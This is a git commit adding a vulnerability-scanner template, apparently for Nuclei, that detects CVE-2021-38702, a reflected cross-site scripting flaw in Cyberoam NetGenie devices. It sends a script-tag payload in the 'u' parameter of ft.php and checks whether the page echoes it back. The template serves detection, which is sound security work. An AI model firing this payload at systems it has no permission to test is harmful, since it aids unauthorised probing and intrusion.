Create CVE-2021-38702.yaml

2021-08-17 08:11:02 -05:00 · 2021-08-17 08:11:02 -05:00 · 888c9a4573
parent 59b2aeda40
commit 888c9a4573
1 changed files with 24 additions and 0 deletions
--- a/cves/2021/CVE-2021-38702.yaml
+++ b/cves/2021/CVE-2021-38702.yaml
@ -0,0 +1,24 @@
+id: CVE-2021-38702
+
+info:
+  name: Cyberoam NetGenie XSS
+  description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php.
+  reference: https://seclists.org/fulldisclosure/2021/Aug/20
+  author: geeknik
+  severity: medium
+  tags: cve,cve2021,cyberoam,netgenie,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tweb/ft.php?u=<script>confirm(\"{{randstr}}\")</script>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>confirm(\"{{randstr}}\")</script>"
+      - type: word
+        words:
+          - "text/html"
+        part: header